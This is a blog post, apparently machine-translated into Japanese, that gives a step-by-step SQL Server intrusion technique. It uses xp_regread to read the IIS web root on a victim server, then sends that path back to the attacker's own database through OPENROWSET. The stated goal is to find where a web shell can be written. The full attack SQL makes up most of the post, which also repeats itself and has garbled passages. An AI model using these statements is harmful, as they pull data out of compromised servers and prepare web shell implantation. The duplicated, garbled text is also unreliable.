潜入でopenrowsetでシェルを取得する方法
2022-01-02 18:04:11
侵入時にopenrowsetでシェルを取得する方法
まず思いつくのはBACKUP WEBSHELLで、NBに投げて走り回り、SQLのエラーメッセージがブロックされ、物理パスが使えないことがわかり、PP馬が書かれている。
私は非常に高い権限のコマンドopenrowset、クロスライブラリサーバクエリを考えると、リモートデータベースにSQLコマンドを送信し、返された結果を参照してくださいすることですが、イベントの追跡を開始する 我々は、データベースにサイトの情報を書き込むことができ、その後、%$^%$@#$@^%$〜。
まず、自分のマシンにSQLデータベースを作成します
次に、もう一台のマシンにテーブルを作成します create table [dbo]. [fenggou]([cha8][char](255)) --
相手側で実行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMCONTROLSet001ServicesGuideW3SVCParameters Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a. * FROM OPENROWSET(''SQLOLEDB'', ''own IP''; ''sa''; ''your password'', ''select * FROM pubs.dbo.authors where au_fname='''' + @result + '''''AS a');--。
このようにすると、fenggouのテーブルにはこのような行ができます select a.* FROM OPENROWSET('SQLOLEDB','own IP';'sa';'your password', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1 ''') aとして
もちろん、''D:↵WEB"''はレジストリプルから読み込んだ物理パスです。次に、DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);-- を実行します。
select a.* FROM OPENROWSET('SQLOLEDB','own IP';'sa';'your password', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1'') の実行に相当するものである。aとして
OK, この時点で、あなたのマシンの SQL イベントトラッカーに select * FROM pubs.dbo.authors where au_fname='D:\WEB,,,1' と表示されるはずです。
わははははははははははははははははははははは物理パスはこちら ライトポニーは大きな馬を追い越せ〜。
まず思いつくのはBACKUP WEBSHELLで、NBに投げて走り回り、SQLのエラーメッセージがブロックされ、物理パスが使えないことがわかり、PP馬が書かれている。
私は非常に高い権限のコマンドopenrowset、クロスライブラリサーバクエリを考えると、リモートデータベースにSQLコマンドを送信し、返された結果を参照してくださいすることですが、イベントの追跡を開始する 我々は、データベースにサイトの情報を書き込むことができ、その後、%$^%$@#$@^%$〜。
まず、自分のマシンにSQLデータベースを作成します
次に、もう一台のマシンにテーブルを作成します create table [dbo]. [fenggou]([cha8][char](255)) --
相手側で実行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEMCONTROLSet001ServicesGuideW3SVCParameters Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a. * FROM OPENROWSET(''SQLOLEDB'', ''own IP''; ''sa''; ''your password'', ''select * FROM pubs.dbo.authors where au_fname='''' + @result + '''''AS a');--。
このようにすると、fenggouのテーブルにはこのような行ができます select a.* FROM OPENROWSET('SQLOLEDB','own IP';'sa';'your password', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1 ''') aとして
もちろん、''D:↵WEB"''はレジストリプルから読み込んだ物理パスです。次に、DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);-- を実行します。
select a.* FROM OPENROWSET('SQLOLEDB','own IP';'sa';'your password', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1'') の実行に相当するものである。aとして
OK, この時点で、あなたのマシンの SQL イベントトラッカーに select * FROM pubs.dbo.authors where au_fname='D:\WEB,,,1' と表示されるはずです。
わははははははははははははははははははははは物理パスはこちら ライトポニーは大きな馬を追い越せ〜。
関連
-
他人のQQチャット記録を確認する方法を調べる方法 QQチャット記録を確認する詳細な方法?
-
mysql5 インジェクションの脆弱性
-
WebサイトにおけるInvisible Bomb eWebEditorのファイルアップロードの脆弱性に対するパッチについて
-
ASPインジェクションの手法を網羅的に理解する【収録概要
-
Wish poolプラグインリモートコンテナの脆弱性
-
Wind Newsletter 4.0の未公開バグについて
-
Macでmitmproxyを使ってHTTPSのデータを取得する方法
-
Sql2005インジェクションアシストスクリプト[修正版]について
-
Dでよく使われるインジェクションコマンドをいくつかまとめてみました。
-
コンピュータが他人に操作されるのを防ぐ
最新
-
nginxです。[emerg] 0.0.0.0:80 への bind() に失敗しました (98: アドレスは既に使用中です)
-
htmlページでギリシャ文字を使うには
-
ピュアhtml+cssでの要素読み込み効果
-
純粋なhtml + cssで五輪を実現するサンプルコード
-
ナビゲーションバー・ドロップダウンメニューのHTML+CSSサンプルコード
-
タイピング効果を実現するピュアhtml+css
-
htmlの選択ボックスのプレースホルダー作成に関する質問
-
html css3 伸縮しない 画像表示効果
-
トップナビゲーションバーメニュー作成用HTML+CSS
-
html+css 実装 サイバーパンク風ボタン
おすすめ
-
よくあるウェブ攻撃について解説
-
優れたWebログセキュリティ解析ツール10選 おすすめまとめ
-
QQは、履歴を削除する方法簡単な方法を復元するためにチャット
-
SA サンドボックスモードで xp_cmdshell と xplog70.dll をリストアせずにコマンドを実行する。
-
JSとC#それぞれのアンチインジェクションコード
-
ASP、PHP、.NETのHTTP-REFERERの偽造方法と偽造REFERERを防止するための方法
-
PHPSHELLがまた新しくなりました
-
asp cer cdx htrファイルのアップロードを許可しないサイトでの解決策!
-
SQLインジェクション(SQL Injection)の攻撃方法を学ぶ
-
サーブユーが管理者パスワードを入手する新手口(スピン)